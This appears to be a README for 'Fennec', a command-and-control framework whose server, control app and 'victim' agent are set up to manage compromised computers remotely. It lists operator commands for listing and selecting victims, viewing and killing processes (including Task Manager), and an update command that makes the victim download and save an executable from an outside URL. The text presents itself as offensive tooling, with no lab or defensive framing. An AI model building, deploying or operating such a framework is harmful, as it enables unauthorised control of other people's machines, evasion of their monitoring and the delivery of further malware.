Fennec Command and Control (C2) framework with three components: a victim agent, a server, and a control app. The victim connects to the server, and the control app manages the victim through the server.
-
Host the Server
Start the server and make it publicly accessible. -
Connect Clients and Victims
Configure the client and victim to connect to the server by updating the IP address and port as needed.
-
List all connected victims:
lv
-
Select a victim:
sv <id>
example:-
sv 0
-
Execute commands on the selected victim:
After selecting a victim usingsv <victim_id>
, you can execute the following commands:- View running processes:
Use the following command to display a list of all running processes on the selected victim:
exec tasklist
- Kill a specific process:
Use the following command to terminate a specific process on the selected victim:
exec kill <process_name>
Example:
To kill the Task Manager process (taskmgr.exe
), use:exec kill taskmgr.exe
- Updating the victim app:
Use the following command to terminate a specific process on the selected victim:
URL should not be
https
exec update <url> <app_name>
app_name
is the way how victim app will save in victims pcExample:
exec update example.com srv.exe
- View running processes: